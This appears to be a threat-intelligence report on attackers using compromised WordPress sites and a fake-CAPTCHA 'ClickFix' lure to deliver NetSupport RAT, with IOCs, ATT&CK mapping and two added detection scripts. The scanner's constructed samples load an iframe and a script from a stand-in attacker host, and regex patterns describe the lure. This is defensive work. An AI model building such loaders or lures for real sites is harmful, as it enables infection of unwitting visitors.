Full Report
In May 2025, the Cybereason Global Security Operations Center (GSOC) detected threat actors using compromised WordPress websites to deliver malicious builds of the legitimate NetSupport Manager remote access tool, repurposed as a Remote Access Trojan (RAT).
Analysis Summary
# Tool/Technique: Malicious NetSupport Manager RAT Delivery via Compromised WordPress
## Overview
Threat actors are using compromised WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT). The delivery chain involves phishing, website compromise, JavaScript injection, social engineering via a fake CAPTCHA, and subsequent execution of the RAT payload.
## Technical Details
- Type: Malware (Remote Access Trojan Payload) & Delivery Framework
- Platform: Windows (the Run-dialog lure and the batch/PowerShell payload chain only work there; the injected script engages Windows visitors only)
- Capabilities: command and control (C2), remote command execution, reconnaissance, and potential data exfiltration through the RAT
- First Seen: May 2025 (Detection reported by Cybereason GSOC)
## MITRE ATT&CK Mapping
* **TA0042 - Resource Development**
  * T1584.004 - Compromise Infrastructure: Server (compromised WordPress sites used as the first delivery stage)
* **TA0001 - Initial Access**
  * T1566 - Phishing
  * T1566.001 - Spearphishing Attachment (implied via PDF attachments)
  * T1189 - Drive-by Compromise (injected iframe/script served to visitors of the compromised site)
* **TA0002 - Execution**
  * T1204 - User Execution (the victim pastes the clipboard contents into the Run dialog; current ATT&CK versions track this as T1204.004 Malicious Copy and Paste)
  * T1059 - Command and Scripting Interpreter
  * T1059.003 - Windows Command Shell (batch file `jfgf.bat` execution)
  * T1059.001 - PowerShell (extraction of the retrieved ZIP archive)
* **TA0003 - Persistence**
  * *May involve persistence mechanisms via the RAT, but not explicitly detailed in the delivery mechanism.*
* **TA0005 - Defense Evasion**
  * T1027 - Obfuscated Files or Information (malicious JavaScript obfuscation/dynamic loading)
* **TA0011 - Command and Control**
  * T1071 - Application Layer Protocol (implied by RAT C2 communication)
  * T1219 - Remote Access Software/Tools (NetSupport Manager client used as the implant)
## Functionality
### Core Capabilities
- **Delivery Chain:** Compromised WordPress sites serve the secondary stages (an injected iframe, then remotely loaded JavaScript), so the victim's first contact is with a site they have no reason to distrust.
- **Platform Targeting:** The injected code only engages visitors on Windows, the one platform on which the Win + R instruction and the batch payload work.
- **Masquerading:** A fake CAPTCHA page (built with React/Tailwind CSS) socially engineers users into executing a command themselves; no browser exploit is involved.
- **Payload Download/Execution:** The pasted command downloads and runs a batch file (`jfgf.bat`), which retrieves a ZIP archive that PowerShell extracts before the NetSupport client is launched.
### Advanced Features
- **Anti-Revisit Check:** The initial malicious JavaScript (`j.js`) checks the browser's `localStorage` for a `lastvisit` key and skips loading the iframe if the user has already encountered the page, so a returning visitor (or an analyst reloading the page) sees only the clean site.
- **Dynamic Injection:** The stage-2 `index.php`, loaded in the injected iframe, creates a `<script>` element at runtime whose `src` points to `select.js`, so the CAPTCHA code is fetched from attacker infrastructure at page-load time rather than stored on the compromised site.
- **ClickFix Technique:** The page copies a command to the user's clipboard (`navigator.clipboard.writeText(nE.command)`) and instructs the user to open the Windows Run dialog (Win + R), paste, and press Enter. The browser only writes text; every OS-level action is performed by the victim, which is why endpoint telemetry, not browser sandboxing, is where this chain becomes visible.
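As an added illustration (example code, not from the Cybereason report or the actor's scripts), the following Node.js script scans JavaScript or HTML text for the traits listed above: the `lastvisit` localStorage gate, runtime creation of iframe/script elements, a Windows user-agent check, CAPTCHA wording, and a clipboard write paired with a Win + R instruction. The indicator list, weights, thresholds and the three sample inputs are the example's own assumptions; the sample that imitates the lure carries only a placeholder command.

```javascript
// Added example (not Cybereason's code): static scan of page/script source for the
// loader and ClickFix lure patterns described in the report. Indicator names,
// weights, thresholds and the sample inputs below are constructed for this example.

const INDICATORS = [
  { id: "clipboard_write", weight: 2, re: /navigator\.clipboard\.writeText\s*\(/,
    note: "page writes a string to the clipboard" },
  { id: "run_dialog_lure", weight: 3, re: /\bwin(dows)?\s*\+\s*r\b|run\s+dialog/i,
    note: "text tells the user to open the Windows Run dialog" },
  { id: "revisit_gate", weight: 2, re: /localStorage\.(getItem|setItem)\s*\(\s*['"]lastvisit['"]/,
    note: "'lastvisit' localStorage gate (serve the lure once per browser)" },
  { id: "dynamic_script", weight: 1, re: /createElement\s*\(\s*['"]script['"]\s*\)/,
    note: "script element created at runtime" },
  { id: "dynamic_iframe", weight: 1, re: /createElement\s*\(\s*['"]iframe['"]\s*\)/,
    note: "iframe element created at runtime" },
  { id: "windows_ua_check", weight: 1, re: /navigator\.(userAgent|platform)[^;\n]*windows/i,
    note: "branches on a Windows user agent" },
  { id: "captcha_lure", weight: 1, re: /verify (you are|you're) human|not a robot|captcha/i,
    note: "CAPTCHA-style wording" },
];

// Returns one hit per matching indicator, with the matched excerpt for triage.
function scanSource(text) {
  const hits = [];
  for (const ind of INDICATORS) {
    const m = text.match(ind.re);
    if (m) hits.push({ id: ind.id, weight: ind.weight, note: ind.note, excerpt: m[0] });
  }
  return hits;
}

// The defining ClickFix pair (clipboard write + Run-dialog instruction) is decisive on
// its own. Otherwise two or more weaker indicators together are worth a look, while a
// lone clipboard write (an ordinary "copy" button) is not flagged.
function classify(hits) {
  const ids = new Set(hits.map((h) => h.id));
  if (ids.has("clipboard_write") && ids.has("run_dialog_lure")) return "likely_clickfix";
  const score = hits.reduce((s, h) => s + h.weight, 0);
  if (ids.size >= 2 && score >= 2) return "suspicious";
  return "clean";
}

// Constructed sample 1: imitates the lure described in the report (placeholder command).
const SAMPLE_CLICKFIX = `
if (!localStorage.getItem('lastvisit')) {
  localStorage.setItem('lastvisit', Date.now());
  var f = document.createElement('iframe');
  f.src = 'https://attacker.invalid/files/index.php';
  document.body.appendChild(f);
}
var nE = { command: '<placeholder command>' };
document.getElementById('verify').onclick = function () {
  navigator.clipboard.writeText(nE.command);
  document.getElementById('msg').textContent =
    'Verify you are human: press Win + R, then Ctrl + V and Enter';
};
`;

// Constructed sample 2: a benign documentation-site copy button.
const SAMPLE_COPY_BUTTON = `
document.getElementById('copy').addEventListener('click', function () {
  navigator.clipboard.writeText(document.getElementById('code').textContent);
});
`;

// Constructed sample 3: a stage-2 style loader (Windows check + remote script element).
const SAMPLE_LOADER = `
if (navigator.userAgent.indexOf('Windows') !== -1) {
  var s = document.createElement('script');
  s.src = 'https://attacker.invalid/select.js';
  document.head.appendChild(s);
}
`;

function scanAll() {
  const samples = { SAMPLE_CLICKFIX, SAMPLE_COPY_BUTTON, SAMPLE_LOADER };
  const out = {};
  for (const [name, src] of Object.entries(samples)) {
    const hits = scanSource(src);
    out[name] = { verdict: classify(hits), indicators: hits.map((h) => h.id) };
  }
  return out;
}

console.log(JSON.stringify(scanAll(), null, 2));
```

Run it over crawled copies of a site's pages and theme/plugin JavaScript; the `excerpt` field is what an analyst needs to confirm a hit. The regexes assume readable source, so heavily obfuscated stages (T1027 above) will only be caught after deobfuscation or by scanning what the browser actually executes.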
## Indicators of Compromise
- File Hashes:
- `9c4349534c137e3e43fb2e2caf049f9d` (MD5)
- `4f496bfde39ca83644265d8d1d9bc9da` (MD5)
- `c05f8ec5afbabc36f1c1366549290ae6` (MD5)
- `20ed4df3a9c734c1788bd2ca2658aedb` (MD5)
- `ee75b57b9300aab96530503bfae8a2f2` (MD5)
- `1768c9971cea4cc10c7dd45a5f8f022a` (MD5)
- File Names:
- `j.js` (Initial malicious JavaScript)
- `index.php` (Stage 2 dynamic loader)
- `select.js` (Stage 3 CAPTCHA script)
- `jfgf.bat` (Batch script executed post-user input)
- Registry Keys: N/A
- Network Indicators:
- `islonline[.]org` (Source for `j.js`)
- `AttackerDomain/files/index.php` (Example URL structure for Stage 2)
- `77.83.199[.]34` (IP)
- `jaagnet[.]com` (Domain)
- `107.180.0[.]222` (IP)
- `83.229.17[.]68` (IP)
- Behavioral Indicators:
- Injection of iframe/script tags into the DOM of a legitimate website.
- Use of PowerShell to extract contents of a retrieved ZIP archive.
- Execution of the NetSupport Client process post-infection.
- Threat actor using NetSupport Remote Command Prompt for reconnaissance.
## Associated Threat Actors
- No named threat group is attributed in the report; the activity is characterized by the use of compromised WordPress infrastructure and the ClickFix technique to deliver NetSupport RAT.
## Detection Methods
- Signature-based detection: Hash matching on the identified payload and script files, and blocking of the listed domains and IPs. Hashes of the JavaScript stages are the weakest of these, since the attacker can re-serve them with trivial changes.
- Behavioral detection: On the web side, monitoring for injected tags (iframe, script, or meta/anchor elements) that trigger remote script loads from otherwise static pages. On the endpoint, the sequence that matters is `explorer.exe` (the parent of anything launched from the Run dialog) spawning `cmd.exe` or `powershell.exe` with a command line that fetches and runs a `.bat`, followed by PowerShell ZIP extraction (e.g. `Expand-Archive`) and the start of a NetSupport client process.
- YARA rules: Could be developed for unique string patterns within `j.js` (the `lastvisit` localStorage check) or the fake CAPTCHA implementation (a `navigator.clipboard.writeText` call alongside Run-dialog instructions).
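To make the endpoint half of that sequence concrete, here is an added example (not from the report) that correlates Sysmon-style process-creation events into the chain: a shell spawned by `explorer.exe` whose command line fetches or runs a `.bat`, a descendant PowerShell running `Expand-Archive`, and a NetSupport client (`client32.exe`, the NetSupport Manager client binary name) below it. The events, PIDs, paths and the `Expand-Archive` cmdlet are assumptions of the example; the report only says PowerShell extracted a ZIP.

```javascript
// Added example (not Cybereason's code): correlate Sysmon-style process-creation
// events into the ClickFix execution chain described in the report. The events,
// PIDs and paths are constructed; the download step in the pasted command is omitted.

const SHELLS = new Set(["cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"]);
const LAUNCH_RE = /https?:\/\/|\.bat\b/i;   // pasted command fetches something or runs a .bat
const EXTRACT_RE = /Expand-Archive/i;        // assumed cmdlet for the ZIP extraction step
const NETSUPPORT_CLIENT = "client32.exe";    // NetSupport Manager client binary

const EVENTS = [
  { pid: 100, ppid: 10, image: "C:\\Windows\\explorer.exe", cmd: "C:\\Windows\\explorer.exe" },
  // Run dialog (Win + R) launches its command as a child of explorer.exe.
  { pid: 200, ppid: 100, image: "C:\\Windows\\System32\\cmd.exe",
    cmd: "cmd.exe /c <download step omitted> && C:\\Users\\u\\AppData\\Local\\Temp\\jfgf.bat" },
  { pid: 300, ppid: 200, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    cmd: "powershell.exe -NoProfile -Command Expand-Archive -Path C:\\Users\\u\\AppData\\Local\\Temp\\c.zip -DestinationPath C:\\Users\\u\\AppData\\Roaming\\x" },
  { pid: 400, ppid: 300, image: "C:\\Users\\u\\AppData\\Roaming\\x\\client32.exe", cmd: "client32.exe" },
  // Benign: an admin opening a prompt from the Run dialog to check network settings.
  { pid: 500, ppid: 100, image: "C:\\Windows\\System32\\cmd.exe", cmd: "cmd.exe /c ipconfig /all" },
];

function basename(p) {
  return p.split(/[\\/]/).pop().toLowerCase();
}

// Returns one alert per explorer.exe-spawned shell whose command line looks like the
// pasted ClickFix command, with the later stages found among its descendants.
function detectClickFixChain(events) {
  const byPid = new Map();
  const children = new Map();
  for (const e of events) {
    byPid.set(e.pid, e);
    if (!children.has(e.ppid)) children.set(e.ppid, []);
    children.get(e.ppid).push(e);
  }
  const alerts = [];
  for (const e of events) {
    const parent = byPid.get(e.ppid);
    if (!parent || basename(parent.image) !== "explorer.exe") continue;
    if (!SHELLS.has(basename(e.image)) || !LAUNCH_RE.test(e.cmd)) continue;
    const stages = ["run_dialog_launch"];
    const stack = [...(children.get(e.pid) || [])];  // depth-first walk of descendants
    while (stack.length) {
      const d = stack.pop();
      const img = basename(d.image);
      if (img === "powershell.exe" && EXTRACT_RE.test(d.cmd) && !stages.includes("zip_extract")) {
        stages.push("zip_extract");
      }
      if (img === NETSUPPORT_CLIENT && !stages.includes("netsupport_client")) {
        stages.push("netsupport_client");
      }
      stack.push(...(children.get(d.pid) || []));
    }
    const severity = stages.includes("netsupport_client") ? "high"
      : stages.includes("zip_extract") ? "medium" : "low";
    alerts.push({ rootPid: e.pid, command: e.cmd, stages, severity });
  }
  return alerts;
}

console.log(JSON.stringify(detectClickFixChain(EVENTS), null, 2));
```

The `explorer.exe` parent check also covers double-clicked shortcuts and files, so the command-line test is what carries the signal; a URL or `.bat` reference in a shell launched directly by the desktop is rare for ordinary users. Other ClickFix variants paste into the Windows Terminal or the File Explorer address bar, so production rules should broaden the parent and shell lists rather than depend on this one path.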
## Mitigation Strategies
- **Prevention:** Block the identified malicious domains and IPs at the network edge. Educate users that no legitimate website asks them to open the Run dialog and paste a command, and where users do not need it, disable the Run dialog on managed endpoints (the Explorer `NoRun` policy), which removes this variant's execution path.
- **Hardening:** Apply a strict Content Security Policy (CSP) on all websites, especially WordPress installations, to restrict inline script execution and remote resource loading. CSP only helps where the injection is limited to page content; an attacker with write access to theme or plugin files can also change the response headers, so CSP complements rather than replaces regular patching of WordPress core, themes and plugins and file-integrity monitoring that would catch an injected `j.js` reference.
- **Containment:** Immediate isolation of compromised endpoints. Forensic imaging for evidence preservation.
## Related Tools/Techniques
- NetSupport Manager RAT (used as the final payload)
- Phishing Kits/Delivery Frameworks employing fileless or multi-stage delivery via web compromises.
- Techniques similar to "ClickFix" where browser features are manipulated to trick users into running malicious commands via the operating system shell.